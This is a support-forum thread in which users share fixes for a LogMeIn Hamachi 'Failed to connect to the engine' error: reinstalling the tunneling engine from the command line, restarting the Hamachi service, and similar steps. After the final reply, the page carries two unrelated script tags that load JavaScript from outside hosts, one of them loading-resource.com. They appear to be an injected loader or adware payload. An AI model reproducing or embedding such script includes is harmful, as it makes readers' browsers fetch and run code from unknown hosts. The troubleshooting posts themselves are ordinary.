Reply
New Contributor
emperor_kk
Posts: 1
0

Re: Failed to connect to the engine

the solution is the following for those that cannot find the service or the service seems to be always on starting

 

open cmd.exe

write cd\

go to  the hamachi program directory

then cd "C:\Program Files (x86)\LogMeIn Hamachi" to go to hamachi installation directory (change to your own path as necessary)

 

then write hamachi-2 -u

to uninstall the tunneling engine

then write hamachi-2 -i

to install the tunellingengine

 

if it dosn't start automatically write

hamachi-2 -s

to start the engine

 

the end...

 

 

New Contributor
tobboy
Posts: 1
0

Re: Failed to connect to the engine

New Contributor
fangblade
Posts: 1
0

Re: Failed to connect to the engine

i tried it and it didnt work

New Contributor
RidgeGT
Posts: 1
0

Re: Failed to connect to the engine

OK here's what i do every time i get this error :

 

1. Open up task manager

 

2. Click on the "Procceses" tab

 

3.Then click " Show proccesses from all users"

 

4. Now click on the "Services" Tab

 

5. Look for "Hamachi2Svc" and right click it

 

6. It should give you an option to   (a.)   "Stop service"     or     (b.)"Start Service"

 

7.(a)  Click "Stop Service" then "Start Service"

 

7.(b) Just click start "Start Service"

 

8.The service should be starting and now you should be able open up Hamachi with out getting this error.

New Contributor
coolguy131
Posts: 1
0

Re: Failed to connect to the engine

Some people tell me to do it your way but I don't want to lose my servers. I own 4 and joined like 10-15 and I don't remember there passwords or maybe even names!!!! So what will I do! None of the others help.

New Contributor
armsagitta
Posts: 1
0

Re: Failed to connect to the engine

[ Edited ]

Mannually staring the LogMeIn Hamachi Tunneling Engine fixes the problem!

New Contributor
Kittycatman321
Posts: 1
0

Re: Failed to connect to the engine

SOLUTION!

 

i have found a solution all you must do is go to controlpanel>AdministaterTools>sevices and find the service called Logmein and if it is not running then right click on it and click run.

 

Hope this helps everyone who is having this problem if it doesnt work for you please let me know Thank you ;)

New Contributor
Kaneida118
Posts: 1
0

Re: Failed to connect to the engine

I still have this problem after everything. If i try to go through services i get this error.

 

Windows could not start the LogMeIn Hamachi 2.0 Tunneling Engine service on the local computer

 

Error 1503: the service did not respond to the start or control request in a timely fashion.

Advisor
szametu
Posts: 261
0

Re: Failed to connect to the engine

looks like it's windows issiue. you can try to create new windows account, and on it try to install hamachi. if not, run windows as administrator ( reboot and f8 ) and now try to start services. if not, simply reinstalind windows will be best way to fix it

New Contributor
DKATZ
Posts: 1
0

Re: Failed to connect to the engine

[ Edited ]

Start, Run ---> services.msc

 

Find LogMeIn Hamachi, make sure all services are started

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script> <script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>